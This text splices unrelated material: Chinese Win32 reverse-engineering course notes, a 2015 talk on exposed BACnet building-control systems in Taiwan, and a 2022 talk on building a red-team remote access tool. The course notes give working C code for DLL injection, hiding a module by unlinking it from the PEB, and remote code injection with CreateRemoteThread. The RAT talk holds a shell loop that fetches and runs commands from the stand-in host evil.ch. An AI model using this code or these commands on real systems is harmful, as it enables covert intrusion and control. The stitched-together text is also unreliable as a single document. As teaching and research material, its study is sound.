                return (int)pe32.th32ProcessID;
            }
        } while (Process32Next(hProcessSnapShot, &pe32));
    }
    else
    {
        CloseHandle(hProcessSnapShot);
    }
    return 0;
}

int main()
{
    DWORD dwCtrlCode = 0;
    // command queue
    DWORD dwOrderList[10] = {1, 1, 2, 3, 3, 1, 2, 1, 3, 4};

    printf("Are you ready? \n");

    getchar();

    if (Init()) {
        LoadDll(GetPID("Test.exe"), (char*)"C:\\Documents and Settings\\Administrator\\桌面\\test\\B.dll");
    }

    for (int i = 0; i < 10; i++)
    {
        dwCtrlCode = dwOrderList[i];
        CopyMemory(lpBuffer, &dwCtrlCode, 4);
        Sleep(2000);
    }

    getchar();

    return 0;
}
Process A is executed and controlled successfully:
模块隐藏 – 155
1.
2.
1.
2.
30 模块隐藏
之前我们了解了直接注入一个DLL到进程中,但是这样实际上是很难存活的,因为程序很容易就可以通过API来
获取当前加载的DLL模块,所以我们需要使用模块隐藏技术来隐藏自己需要注入的DLL模块。
30.1 模块隐藏之断链
API是通过什么将模块查询出来的?其实API都是从这几个结构体(结构体属于3环应用层)中查询出来的:
TEB(Thread Environment Block,线程环境块),它存放线程的相关信息,每一个线程都有自己的TEB信
息,FS:[0]即是当前线程的TEB。
PEB(Process Environment Block,进程环境块),它存放进程的相关信息,每个进程都有自己的PEB信
息,FS:[0x30]即当前进程的PEB。
如下图所示(只介绍与本章节相关的信息)
TEB第一个成员是一个结构体,这个结构体包含了当前线程栈栈底和当前线程栈的界限;TEB的020偏移
是一个结构体,其包含了两个成员,一个是当前线程所在进程的PID和当前线程自己的线程ID;
PEB的00c偏移是一个结构体,这个结构体包括模块链表,API函数遍历模块就是查看这个链表。
我们如何去获取这个TEB结构体呢?我们可以随便找一个EXE拖进DTDebug,然后来看一下FS寄存器(目前你
只需要知道TEB的地址就存储在FS寄存器中即可,具体细节在中级课程中):
滴水逆向课程笔记 – Win32
模块隐藏 – 156
我们可以在左下角使用dd 7FFDF000命令来查看TEB结构体:
滴水逆向课程笔记 – Win32
模块隐藏 – 157
FS寄存器中存储的就是当前正在使用的线程的TEB结构体的地址。
PEB结构体同理,我们只需要找到FS寄存器中存储地址的0x30偏移然后跟进即可:
滴水逆向课程笔记 – Win32
模块隐藏 – 158
滴水逆向课程笔记 – Win32
模块隐藏 – 159
我们之前已经了解到了API函数遍历模块就是查看PEB那个链表,所以我们要想办法让它在查询的时候断链。
30.1.1 断链实现代码
如下我们通过断链的方式实现了一个隐藏模块的函数:
滴水逆向课程笔记 – Win32
模块隐藏 – 160
我们可以调用隐藏kernel32.dll这个模块,然后用DTDebug来查看一下:
编译打开(不使用VC6打开)Test.exe然后使用DTDebug来Attach进程:
void HideModule(char* szModuleName) {
    // Get the module's handle (which is its base address)
    HMODULE hMod = GetModuleHandle(szModuleName);
    PLIST_ENTRY Head, Cur;
    PPEB_LDR_DATA ldr;
    PLDR_MODULE ldmod;

    __asm {
        mov eax, fs:[0x30]    // fetch the PEB
        mov ecx, [eax + 0x0c] // fetch the structure at PEB offset 0x0c: PEB_LDR_DATA
        mov ldr, ecx          // store it in ldr
    }
    // Get the load-order module list
    Head = &(ldr->InLoadOrderModuleList);
    Cur = Head->Flink;
    do {
        // The CONTAINING_RECORD macro recovers the address of the whole structure
        // from the address of one of its members
        ldmod = CONTAINING_RECORD(Cur, LDR_MODULE, InLoadOrderModuleList);
        // Walk the list; when the base address matches we have found our module, so unlink it
        if (hMod == ldmod->BaseAddress) {
            // Unlinking is simple: cross-connect the neighbours' pointers past this entry
            ldmod->InLoadOrderModuleList.Blink->Flink = ldmod->InLoadOrderModuleList.Flink;
            ldmod->InLoadOrderModuleList.Flink->Blink = ldmod->InLoadOrderModuleList.Blink;

            ldmod->InInitializationOrderModuleList.Blink->Flink = ldmod->InInitializationOrderModuleList.Flink;
            ldmod->InInitializationOrderModuleList.Flink->Blink = ldmod->InInitializationOrderModuleList.Blink;

            ldmod->InMemoryOrderModuleList.Blink->Flink = ldmod->InMemoryOrderModuleList.Flink;
            ldmod->InMemoryOrderModuleList.Flink->Blink = ldmod->InMemoryOrderModuleList.Blink;
        }
        Cur = Cur->Flink;
    } while (Head != Cur);
}
int main(int argc, char* argv[]) {
    getchar();
    HideModule("kernel32.dll");
    getchar();
    return 0;
}
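To see the unlink take effect, you can walk the same list yourself and print each entry before and after calling HideModule(). A minimal sketch — PrintModules is an illustrative name, and it reuses the PEB_LDR_DATA/LDR_MODULE definitions from earlier in these notes:

void PrintModules()
{
    PPEB_LDR_DATA ldr;
    PLIST_ENTRY Head, Cur;
    PLDR_MODULE ldmod;

    __asm {
        mov eax, fs:[0x30]    // PEB
        mov ecx, [eax + 0x0c] // PEB->Ldr, the PEB_LDR_DATA
        mov ldr, ecx
    }

    Head = &(ldr->InLoadOrderModuleList);
    Cur = Head->Flink;
    while (Cur != Head) {
        ldmod = CONTAINING_RECORD(Cur, LDR_MODULE, InLoadOrderModuleList);
        wprintf(L"%p %s\n", ldmod->BaseAddress, ldmod->FullDllName.Buffer);
        Cur = Cur->Flink;
    }
}

Call it once before and once after HideModule("kernel32.dll"); the second listing should no longer contain the kernel32.dll entry.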
At this point we can still see the kernel32.dll module, but after pressing Enter and looking again, it is gone:

30.2 Module Hiding and the PE Fingerprint

First let's look at a module's PE fingerprint, taking ntdll.dll as the example. Its base address is 7c920000, so in DTDebug the command db 7c920000 shows the start of the module:

The module's first two bytes are 4D 5A, i.e. "MZ". Having seen those, read the value at offset 0x3C from the start (the e_lfanew field); here it is E0. Add that 0xE0 to the module base 0x7c920000 to get 0x7c9200E0, and the two bytes at that address are 50 45, i.e. "PE".

That is a PE fingerprint: if a region of memory passes this whole sequence of checks, it is a module.
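The whole check fits in a few lines of C. A minimal sketch — it assumes lpBase points at a readable candidate module base:

// TRUE if lpBase looks like a mapped PE module:
// 'MZ' at offset 0, e_lfanew at offset 0x3C, and 'PE\0\0' at base + e_lfanew.
BOOL IsPeModule(LPVOID lpBase)
{
    PBYTE p = (PBYTE)lpBase;
    if (p[0] != 'M' || p[1] != 'Z')
        return FALSE;
    DWORD e_lfanew = *(DWORD*)(p + 0x3C);          // 0xE0 in the ntdll.dll example
    return *(DWORD*)(p + e_lfanew) == 0x00004550;  // "PE\0\0" in little-endian
}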
30.3 Module Hiding and the VAD Tree

This one involves kernel internals; it is recommended to watch the video for the brief walkthrough.
31 Code Injection

The best hiding is to inject no module at all — that is, code injection: we inject just the code we want to run.

31.1 The Idea Behind Code Injection

We can copy one of our own functions into the target process, so that the target process executes the code we want. That is the whole idea of code injection:

It sounds simple, but it raises several questions:

1. When you copy your function into the target process, what is it that you are actually copying?
2. Will the copy necessarily run over there? What are the preconditions?

31.1.1 Machine Code

First question first. VC6 can show us disassembly, but does a program actually contain assembly text? It does not: what is really there is machine code. In the figure below, the left column is machine code and the right column is the assembly it corresponds to — we only see assembly because VC6's disassembly engine translates the machine code for us:

So what we copy across is machine code.

31.1.2 Preconditions

As the figure below shows, machine code that calls through a hard-coded address cannot simply be injected and executed, because the target process will not have that address mapped for you:

31.2 Rules for Writing Copyable Code

1. No global variables
2. No string literals
3. No system calls
4. No nested calls into other functions

(A common workaround for rule 2 is sketched right after this list.)
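Rule 2 exists because a string literal lives in the source module's data section, and that address means nothing inside the target process. These notes solve it below by passing the string in through a parameter block; another common workaround, shown here as a sketch, is to build the string on the stack so it travels with the copied code:

// The characters are materialized by instructions inside the copied function itself,
// so no pointer back into the source module's data section is needed.
char szKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', '\0' };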
31.3 Passing Parameters

With all these restrictions, what can we do? Suppose the code we want to copy over has to create a file. The flow can look like the figure below:

First we copy our ThreadProc from the injecting process into the target, and hand the copied function's address in the target to CreateRemoteThread — that solves the custom-function part.

Second, to create the file we need CreateFile, but we cannot just call it by name: that call would go through the current process's import table, and the import-table addresses of the current process and the target process will not match, which violates the rules above. The fix is to pass everything through the thread function's parameter: we gather everything the target will need — including the address of CreateFile itself — into a structure, copy that structure into the target process, and pass the structure's address in the target as the thread function's argument.

31.3.1 Implementation

Below is the implementation of remote code injection with parameter passing:
#include <tlhelp32.h>
#include <stdio.h>
#include <windows.h>

typedef struct {
    DWORD dwCreateAPIAddr;               // address of the CreateFile function
    LPCTSTR lpFileName;                  // below: all the parameters CreateFile needs
    DWORD dwDesiredAccess;
    DWORD dwShareMode;
    LPSECURITY_ATTRIBUTES lpSecurityAttributes;
    DWORD dwCreationDisposition;
    DWORD dwFlagsAndAttributes;
    HANDLE hTemplateFile;
} CREATEFILE_PARAM;

// Define a function-pointer type for CreateFile
typedef HANDLE(WINAPI* PFN_CreateFile) (
    LPCTSTR lpFileName,
    DWORD dwDesiredAccess,
    DWORD dwShareMode,
    LPSECURITY_ATTRIBUTES lpSecurityAttributes,
    DWORD dwCreationDisposition,
    DWORD dwFlagsAndAttributes,
    HANDLE hTemplateFile
);

// The function that will be copied into the target process
DWORD _stdcall CreateFileThreadProc(LPVOID lparam)
{
    CREATEFILE_PARAM* Gcreate = (CREATEFILE_PARAM*)lparam;
    PFN_CreateFile pfnCreateFile;
    pfnCreateFile = (PFN_CreateFile)Gcreate->dwCreateAPIAddr;

    // call CreateFile with the full parameter set from the structure
    pfnCreateFile(
        Gcreate->lpFileName,
        Gcreate->dwDesiredAccess,
        Gcreate->dwShareMode,
        Gcreate->lpSecurityAttributes,
        Gcreate->dwCreationDisposition,
        Gcreate->dwFlagsAndAttributes,
        Gcreate->hTemplateFile
    );

    return 0;
}

// Create a file remotely
BOOL RemotCreateFile(DWORD dwProcessID, char* szFilePathName)
{
    BOOL bRet;
    DWORD dwThread;
    HANDLE hProcess;
    HANDLE hThread;
    DWORD dwThreadFunSize;
    CREATEFILE_PARAM GCreateFile;
    LPVOID lpFilePathName;
    LPVOID lpRemotThreadAddr;
    LPVOID lpFileParamAddr;
    DWORD dwFunAddr;
    HMODULE hModule;

    bRet = 0;
    hProcess = 0;
    dwThreadFunSize = 0x400;

    // 1. Get a handle to the process
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);
    if (hProcess == NULL)
    {
        OutputDebugString("OpenProcessError! \n");
        return FALSE;
    }

    // 2. Allocate three regions of memory: parameters, thread function, file name

    // 2.1 For the file name; +1 to include the terminating zero
    lpFilePathName = VirtualAllocEx(hProcess, NULL, strlen(szFilePathName)+1, MEM_COMMIT,
        PAGE_READWRITE); // allocate memory inside the given process

    // 2.2 For the thread function
    lpRemotThreadAddr = VirtualAllocEx(hProcess, NULL, dwThreadFunSize, MEM_COMMIT,
        PAGE_READWRITE); // allocate memory inside the given process

    // 2.3 For the CreateFile parameters
    lpFileParamAddr = VirtualAllocEx(hProcess, NULL, sizeof(CREATEFILE_PARAM), MEM_COMMIT,
        PAGE_READWRITE); // allocate memory inside the given process

    // 3. Initialize the CreateFile parameters
    GCreateFile.dwDesiredAccess = GENERIC_READ | GENERIC_WRITE;
    GCreateFile.dwShareMode = 0;
    GCreateFile.lpSecurityAttributes = NULL;
    GCreateFile.dwCreationDisposition = OPEN_ALWAYS;
    GCreateFile.dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL;
    GCreateFile.hTemplateFile = NULL;

    // 4. Get the address of CreateFile
    // LoadLibrary (and CreateFile) live in kernel32.dll in every process, and that DLL's
    // physical pages are shared, so the address we obtain in our own process is the same
    // as in any other process
    hModule = GetModuleHandle("kernel32.dll");
    GCreateFile.dwCreateAPIAddr = (DWORD)GetProcAddress(hModule, "CreateFileA");
    // a handle from GetModuleHandle takes no reference and needs no FreeLibrary/CloseHandle

    // 5. Point the parameter block at the file name (its address in the target)
    GCreateFile.lpFileName = (LPCTSTR)lpFilePathName;

    // 6. Adjust the thread function's real start address
    dwFunAddr = (DWORD)CreateFileThreadProc;
    // indirect jump: debug builds route functions through a JMP stub, so follow it
    if (*((BYTE*)dwFunAddr) == 0xE9)
    {
        dwFunAddr = dwFunAddr + 5 + *(DWORD*)(dwFunAddr + 1);
    }

    // 7. Start copying
    // 7.1 Copy the file name
    WriteProcessMemory(hProcess, lpFilePathName, szFilePathName, strlen(szFilePathName) + 1, 0);

    // 7.2 Copy the thread function
    WriteProcessMemory(hProcess, lpRemotThreadAddr, (LPVOID)dwFunAddr, dwThreadFunSize, 0);

    // 7.3 Copy the parameters
    WriteProcessMemory(hProcess, lpFileParamAddr, &GCreateFile, sizeof(CREATEFILE_PARAM), 0);

    // 8. Create the remote thread; lpFileParamAddr is the argument passed to the thread
    // function, since the parameter block now lives in the target's memory
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpRemotThreadAddr,
        lpFileParamAddr, 0, &dwThread);
    if (hThread == NULL)
    {
        OutputDebugString("CreateRemoteThread Error! \n");
        CloseHandle(hProcess);
        return FALSE;
    }

    // 9. Release resources
    CloseHandle(hProcess);
    CloseHandle(hThread);
    return TRUE;
}

// Get a process ID from a process name
DWORD GetPID(char *szName)
{
    HANDLE hProcessSnapShot = NULL;
    PROCESSENTRY32 pe32 = {0};

    hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnapShot == (HANDLE)-1)
    {
        return 0;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hProcessSnapShot, &pe32))
    {
        do {
            if (!strcmp(szName, pe32.szExeFile)) {
                // close the snapshot before returning the PID
                CloseHandle(hProcessSnapShot);
                return (int)pe32.th32ProcessID;
            }
        } while (Process32Next(hProcessSnapShot, &pe32));
    }

    CloseHandle(hProcessSnapShot);
    return 0;
}

int main()
{
    // fill in the target process name and the path of the file to create
    RemotCreateFile(GetPID("process name"), "file name");
    return 0;
}
Stephen Hilt, miaoski
2015/8/26-27
Building Automation and Control –
Hacking Subsidized Energy Saving System
1
$ whoami
• miaoski (@miaoski)
• Staff engineer in Trend Micro
• BACnet newbie
2
$ whoami
• Stephen Hilt (@tothehilt)
• Senior threat researcher, Trend Micro
• 10 years ICS security exp
3
Disclaimer
• Do not probe / scan / modify the devices that you don’t own.
• Do not change any value without permission.
• It’s a matter of LIFE AND DEATH.
• Beware! Taiwanese CRIMINAL LAW.
4
Photo courtesy of
Wikimedia, CC0.
BACnet –
Building Automation and Control networks
5
BACnet was designed to allow communication of building automation and control
systems for applications such as heating, ventilating, and air-conditioning control,
lighting control, access control, and fire detection systems and their associated
equipment. http://en.wikipedia.org/wiki/BACnet
Building Automation?
6
Image from http://buildipedia.com/aec-pros/facilities-ops-maintenance/case-study-
cuyahoga-metro-housing-authority-utilizes-bas
Credit: Siemens Building Technologies
Building Automation!
7
Photo courtesy of Chien Kuo Senior High School.
ANSI/ASHRAE 135-2001
8
ICS Protocols
9
• ICS – Industrial Control Systems
• SCADA – Supervisory Control and Data Acquisition
• DCS – Distributed Control Systems
(Most) ICS Protocols
10
Authentication
Encryption
Data Integrity
Homemade BACnet
11
http://bacnet.sourceforge.net/
BACnet Layers map to OSI
12
Credit: icpdas.com
BACnet/IP
13
BACnet/IP = UDP + BVLL + NPDU + APDU + …
14
Charts courtesy of http://www.bacnet.org/Tutorial/BACnetIP/default.html
BACnet/IP = UDP + BVLL + NPDU + APDU + …
15
Charts courtesy of http://www.bacnet.org/Tutorial/BACnetIP/default.html
BBMD = BACnet broadcast management device
BACnet Objects
16
Credit: www.bacnet.org
BACnet-discover-enumerate.nse (1)
17
Object Name Packet Sent == 810a001101040005010c0c023FFFFF194d
77 == 0x4d
Source: ANSI/ASHRAE Standard 135-2001
Source code:
https://github.com/digitalbond/Redpoint/blob/master/BACnet-discover-enumerate.nse
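Field by field, that request decodes roughly as follows (a hedged reading against the BACnet/IP framing; the final property-identifier byte is the one the script varies on the next slide):

// 81 0a 00 11 01 04 00 05 01 0c 0c 02 3f ff ff 19 4d
unsigned char readObjectName[17] = {
    0x81,                   // BVLC type: BACnet/IP
    0x0a,                   // BVLC function: Original-Unicast-NPDU
    0x00, 0x11,             // BVLC length: 17 bytes (whole frame)
    0x01,                   // NPDU version
    0x04,                   // NPDU control: expecting reply
    0x00,                   // APDU type: Confirmed-Request
    0x05,                   // max segments / max APDU size
    0x01,                   // invoke ID
    0x0c,                   // service choice: readProperty (12)
    0x0c,                   // context tag 0, length 4: object identifier
    0x02, 0x3f, 0xff, 0xff, //   object type = device, instance 4194303 (wildcard)
    0x19,                   // context tag 1, length 1: property identifier
    0x4d                    // property 77 (0x4d) = object-name
};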
BACnet-discover-enumerate.nse (2)
• Other Read Properties To Try
– 810a001101040005010c0c023FFFFF19xx
• Vendor ID: 120 (0x78)
• Description: 28 (0x1c)
• Firmware: 44 (0x2c)
• Application Software: 12 (0x0c)
• Model Name: 70 (0x46)
• Location: 58 (0x3a)
• Object Identifier: 75 (0x4b)
18
Source code:
https://github.com/digitalbond/Redpoint/blob/master/BACnet-discover-enumerate.nse
BACnet-discover-enumerate.nse (3)
19
| Vendor ID:
| Object-identifier:
| Firmware:
| Application Software:
| Object Name:
| Model Name:
| Location:
| Broadcast Distribution Table (BDT):
|_ Foreign Device Table (FDT): Empty Table
Vendor ID: A registered BACnet
Vendor
Object-identifier: unique
identifier of the device. If the
Object-Identifier is known, it is
possible to send commands with
BACnet client software, including
those that change values,
programs, schedules, and other
operational information on BACnet
devices.
# nmap --script BACnet-discover-enumerate.nse -sU -p 47808 140.xx.xx.xx
BACnet-discover-enumerate.nse (3)
20
| Vendor ID:
| Object-identifier:
| Firmware:
| Application Software:
| Object Name:
| Model Name:
| Location:
| Broadcast Distribution Table (BDT):
|_ Foreign Device Table (FDT): Empty Table
Broadcast Distribution Table
(BDT) : A list of the BACnet
Broadcast Management Devices
(BBMD) in the BACnet network.
This will identify all of the subnets
that are part of the BACnet
network.
Foreign Device Table (FDT): A
list of foreign devices registered
with the BACnet device. A foreign
device is any device that is not on
a subnet that is part of the BACnet
network, not in the BDT. Foreign
devices often are located on
external networks and could be an
attacker's IP address.
Map Out Connections
21
Nmap scan report for 140-xxx-xxx-xxx.n**k.edu.tw (140.xxx.xxx.xxx)
Host is up (0.00050s latency).
PORT STATE SERVICE
47808/udp open BACNet -- Building Automation and Control Networks
| bacnet-info:
| Vendor ID: Siemens Schweiz AG (Formerly: Landis & Staefa Division Europe) (7)
| Vendor Name: Siemens Building Technologies Inc.
| Object-identifier: 0
| Firmware: 3.7
| Application Software: INT0370
| Object Name: 25OC0001874
| Model Name: Insight
| Description: BACnet Device
| Location: PC
| Broadcast Distribution Table (BDT):
| 140.xxx.xxx.xxx:47808
| 140.xxx.xxx.xxx:47808
| 172.18.9.254:47808
|_ Foreign Device Table (FDT): Non-Acknowledgement (NAK)
FDT NAK!
22
Nmap scan report for 140-xxx-xxx-xxx.n**k.edu.tw (140.xxx.xxx.xxx)
Host is up (0.00050s latency).
PORT STATE SERVICE
47808/udp open BACNet -- Building Automation and Control Networks
| bacnet-info:
| Vendor ID: Siemens Schweiz AG (Formerly: Landis & Staefa Division Europe) (7)
| Vendor Name: Siemens Building Technologies Inc.
| Object-identifier: 0
| Firmware: 3.7
| Application Software: INT0370
| Object Name: 25OC0001874
| Model Name: Insight
| Description: BACnet Device
| Location: PC
| Broadcast Distribution Table (BDT):
| 140.xxx.xxx.xxx:47808
| 140.xxx.xxx.xxx:47808
| 172.18.9.254:47808
|_ Foreign Device Table (FDT): Non-Acknowledgement (NAK)
Let’s Gather MORE Information
• Systems Require you to Join the Network as a Foreign Device
to Enumerate Devices that are attached, as well as points
– Once Registered in FDT, perform a Who-is message
– Parse I-Am responses
– …
– Profit?
23
BACnet Discovery Tool (BDT)
24
View Connected Inputs
25
26
Another day.
Today we look for BACnet devices.
Shodan + BACnet Discovery Tool
27
BACnet port = 0xBAC0 = port 47808
Country: TW
• As of July 29, 2015
• 48 BACnet devices
– 14 Advantech / BroadWin WebAccess Bacnet Server 7.0
– 4 Automated Logic LGR
– 3 Carel S.p.A. pCOWeb
– 2 TAC MNB-1000
– 1 Siemens Insight
• 59 Ethernet/IP
• 23 Moxa Nport Ethernet-RS485 in N**U
28
14 Advantech/BroadWin WebAccess
29
• CVE-2011-4522 XSS in bwerrdn.asp
• CVE-2011-4523 XSS in bwview.asp
• CVE-2011-4524 Long string REC
• CVE-2011-4526 ActiveX buffer overflow
• CVE-2012-0233 XSS of malformed URL
• CVE-2012-0234 SQL injection
• CVE-2012-0236 CSRF (Cross-site report forgery)
• CVE-2012-0237 Unauthorized modification
• CVE-2012-0238 opcImg.asp stack overflow REC
• CVE-2012-0239 Authentication vulnerability (still in 7.0)
• CVE-2012-0240 Authentication vulnerability in GbScriptAddUp.asp
• CVE-2012-0241 Arbitrary memory corruption
• CVE-2012-0242 Format string exploit
• CVE-2012-0243 ActiveX buffer overflow in bwocxrun.ocx
• CVE-2012-0244 SQL injection
11 Protected by Password
30
Kenting Caesar Park Hotel 墾丁凱撒大飯店
11 Protected by Password
31
Chung Hua University 中華大學
11 Protected by Password
32
Dorm, Chung Yuan Christian University 中原大學宿舍
11 Protected by Password
33
Hydean Biotechnology Co., Ltd. 瀚頂生物科技
3 No or Default Password
34
Underground Driveway, ** Road ***車行地下道
Unprotected HMI
35
Unprotected HMI
36
Unprotected HMI
37
Project Management
38
Analog Input Parameters
39
PLC Binary Value
40
Parameter Update
41
Main Graph
42
Turn Off the Aircon and Go Home?
43
Life Is Harder without HMI, But ...
• Trane 2.6.30_HwVer12AB-hydra
• P******* Co., New Taipei City
44
Device 11021 / 11022
45
Analog Inputs
46
Output = Modifiable
47
4 Automated Logic ME-LGR
48
3 Carel pCOWeb
49
2 TAC-MNB
50
Siemens Insight
51
Other than BACnet
• 59 Ethernet/IP in TW
– N**U Library
– N**U Bio Center
– N**U Men’s Dormitory
– N**U Management Division
– ... and so on
• ModBus/TCP
• Simple Ethernet-RS422/485 Adapters
– 23 Moxa NPort in N**U
52
Allen-Bradley Powermonitor 1000
53
Unprotected HMI of Powermonitor 1000
54
Force KYZ
55
KYZ Pulse
56
Circuit courtesy of http://solidstateinstruments.com/newsletters/kyz-pulses.php
Energy Results
57
Voltage Monitor
58
23 Moxa Nport Ethernet-RS485 in N**U
59
Unprotected NPort
60
• 23 NPort in N**U
• 12 firewalled
• 2 password protected
• 9 no password
Dump and Have Fun
61
Legacy Devices (Osaki PowerMax 22)
62
Legacy Devices (Osaki PowerMax 22)
63
Special thanks to
Chien Kuo Senior
High School.
Subsidies from Ministry of Education
64
MOE subsidies ~25,000 USD to schools for:
• Power consumption management system
• Building energies management system
• Improvement of air-condition controls
National Chia-Yi University
65
Contract capacity: 4,700kW
Peak capacity: 5,216kW
Minimum capacity: 2,752 kW
NTU’s Discussion about BACnet
66
Shu-Zen Junior College
67
Taitung Senior Commercial Vocational School
68
St. Mary’s Junior College of Medicine
69
Points in Common
• Subsidized
• Public Tender
• Contracted
Note
You can find the papers on Google.
We did not probe / test their devices.
70
Suggestions
• Password
• Use private IP. No, not corporate LAN
• Firewall, SDN or tagged VLAN
• Upgrade / Patch
• Contract with a pentester
71
Port 47808, TW: 57/12,358
72
Home Automation with Arduino & RPi
73
Project at http://www.instructables.com/id/Uber-Home-Automation-w-Arduino-Pi/
Control System on Your Hand
74
Homepage of http://bacmove.com
Our suggestion:
These things shouldn't even be on the internet, not on the corporate network.
It’s a control system and should be treated as such.
Questions?
75
TAC-MNB Module
76
77
Automated Logic
US$40 (used)
|
US$2,500 (new)
78
MOXA NPort 5130
US$75 - 149 (new)
Carel pCO1000 US$200
pCOWEB, unknown
MNB-1000 US$321.60 | pdf |
1
RAT Development
06/01/2022
Develop
your own
RAT
EDR & AV Defense
Dobin Rutishauser
@dobinrutis
https://bit.ly/3Qg219P
2
RAT Development
06/01/2022
Developer // TerreActive
Pentester // Compass Security
Developer // UZH
SOC Analyst // Infoguard
RedTeam Lead // Raiffeisen
About
SSL/TLS Recommendations
// OWASP Switzerland
Burp Sentinel - Semi Automated Web Scanner
// BSides Vienna
Automated WAF Testing and XSS Detection
// OWASP Switzerland Barcamp
Fuzzing For Worms - AFL For Network Servers
// Area 41
Memory Corruption Exploits & Mitigation
// BFH Berner Fachhochschule
Gaining Access
// OST Ostschweizer Fachhochschule
3
RAT Development
06/01/2022
Red Teaming / Scope
RAT Development
EDR & AV Defense
Conclusion
Diving into the code, 17min
Background, 5min
Bypass all the things, 17min
What does it all mean, 6min
01
02
03
04
4
RAT Development
06/01/2022
Develop
your own
RAT
Red Teaming
5
RAT Development
06/01/2022
Red Teaming
Red Teaming realistically tests overall security posture
●
Not pentest!
●
Simulate certain types of adversaries (CTI)
●
Focus on TTP’s (Tools, Techniques, Procedures)
●
Not so much focus on vulnerabilities
●
Credential stealing, lateral movement, data exfiltration
●
Testing the BlueTeam / SOC
●
PurpleTeaming
(See talk “Building a Red Team” yesterday by Daniel Fabian)
6
RAT Development
06/01/2022
Client
Workstation
HTTP Server
HTTP Proxy
Antivirus
EDR
Sysmon
SIEM/SOAR
Antivirus
Sandbox
Domain Reputation
Content Filter
●
No admin privileges
●
There’s a SOC
●
Internet only via
authenticated HTTP
proxy
Target Security, Products
7
RAT Development
06/01/2022
Windows Client
What is a RAT?
RAT.exe
Remote Access Tool
Client
Beacon
Implant
C2
https://dobin.ch
Command & Control
8
RAT Development
06/01/2022
https://www.microsoftpressstore.com/articles/article.aspx?p=2992603
Killchain
9
RAT Development
06/01/2022
Everyone uses CobaltStrike
Everyone detects CobaltStrike
Writing a RAT yourself may solve
some of your problems?
Why write a RAT?
10
RAT Development
06/01/2022
Windows Client
What is a RAT?
RAT.exe
Windows
Client
Server
In Scope:
Execute RAT
Execute Tools
Not In Scope:
Recon
Exploit
Lateral movement
Privilege escalation
(attacking)
11
RAT Development
06/01/2022
Develop
your own
RAT
RAT
Development
Keep It Simple, Stupid
12
RAT Development
06/01/2022
while true; do
    curl -s evil.ch/getCommand > exec && chmod +x exec && ./exec
done
Your first RAT
13
RAT Development
06/01/2022
Antnium
“Anti-Tanium” (now also Anti-Defender)
github.com/dobin/antnium (300+ commits)
github.com/dobin/antnium-ui (200+ commits)
Antnium
14
RAT Development
06/01/2022
Programming languages:
●
Now native:
○
C, C++, NIM, Zig
○
Go, Rust, Hare
●
Before “managed”:
○
Powershell, C#
(Go) features:
●
Compiled
●
Garbage collection yay
●
Cross compiling (Win, Linux)
●
Reasonably big RedTeaming
ecosystem
●
Can compile as DLL
Choosing a programming language
15
RAT Development
06/01/2022
Use HTTPS as communication channel
●
Simple
●
Reliable
●
Always available
●
Hard to monitor
●
Just need two endpoints:
○
/getCommand
○
/sendAnswer
●
(C2 obfuscation not in scope here)
Communication channel
16
RAT Development
06/01/2022
HTTP communication channel
C2
Go
RAT
Go
Operator UI
Angular
DB
17
RAT Development
06/01/2022
HTTP communication channel
[Diagram: the C2 keeps a packet table in its DB — columns ClientId, PacketId, Arguments, Response — e.g. rows (42, 1, "Cmd: hostname") and (42, 2, "Cmd: whoami"). The operator UI adds packets for a client; the RAT polls c2.ch/get/42 for pending packets and posts its answers back to c2.ch/put/2.]
18
RAT Development
06/01/2022
type Packet struct {
ClientId string
PacketId string
PacketType string
Arguments map[string]string
Response map[string]string
DownstreamId string
}
"Packet": {
"clientid": "c88ld5qsdke1on40m5a0",
"packetid": "59650232820019",
"packetType": "exec",
"arguments": {
"commandline": "hostname",
"shelltype": "cmd",
},
"response": {},
"downstreamId": "client"
},
Packet structure
19
RAT Development
06/01/2022
Demo: HTTP
ID: T1071.001: Command and Control: Web Protocols
ID: T1132.001: Command and Control: Standard Encoding
ID: T1573.001: Command and Control: Encrypted Channel, Symmetric Encryption
ID: T1090.002: Command and Control: External Proxy
20
RAT Development
06/01/2022
C2 Server
RAT
Forwarder
@ EC2
c2.shop.ch
RAT
Forwarder
@ GCP
c2.bank.ch
C2 Server
UI
Reverse
Proxy
ClientKey
ClientKey
GIT
UI
C2 Infrastructre Architecture
Trusted
21
RAT Development
06/01/2022
c := Campaign {
ApiKey: "secretKeyOperator",
EncKey: "secretKeyClient",
ServerUrl: "c2.notavirus.ch",
PacketSendPath: "/send",
PacketGetPath: "/get/",
FileUploadPath: "/upload/",
FileDownloadPath: "/static/",
ClientWebsocketPath: "/ws",
AuthHeader: "X-Session-Token",
UserAgent: "Go-http-client/1.1",
}
Campaign Config
22
RAT Development
06/01/2022
Websocket Communication Channel
C2
RAT
Operator
UI
DB
Websocket:
●
Instant
●
Stealthy
Websocket
Websocket
23
RAT Development
06/01/2022
Demo: Websockets
ID T1008: Command and Control: Fallback Channels
ID: T1059.001 Execution: Command and Scripting Interpreter: Powershell
ID: T1059.003 Execution: Command and Scripting Interpreter: Windows Command Shell0
24
RAT Development
06/01/2022
Websocket Communication Channel
C2
DB
Dev Problems with Websockets:
●
Architecture is upside down
●
Clients are online / offline
●
Client needs to handle disconnects
○
Reconnects
○
Downgrades
○
Upgrades
●
Goroutines + Channels en masse
Thread
Blocking
send
25
RAT Development
06/01/2022
Server Architecture
26
RAT Development
06/01/2022
RAT’s need to execute commands
●
net.exe, ipconfig, wmic, and other lolbins
●
cmd.exe / powershell.exe command lines
●
Maybe have a persistent shell too
Command Execution
27
RAT Development
06/01/2022
Demo: Command Execution
ID: T1059.001 Execution: Command and Scripting Interpreter: Powershell
ID: T1059.003 Execution: Command and Scripting Interpreter: Windows Command Shell
28
RAT Development
06/01/2022
Dev problems with execution
arguments:
●
commandline = “net user dobin”
●
commandline = []string{“net”, “user”, “dobin”}
●
commandline = “c:\program files\test.exe”
●
Cmd.exe is different…
And:
●
Capturing Stdout/Stderr
●
Managing long lasting processes
Demo: Command Execution
29
RAT Development
06/01/2022
UI/UX
●
Intuitive
●
Reliable
●
Effective
●
Every feature in the RAT needs UI!
Dev Problems: SPA
●
Angular, TypeScript
●
RXJS
●
Re-implement most of the server again
○
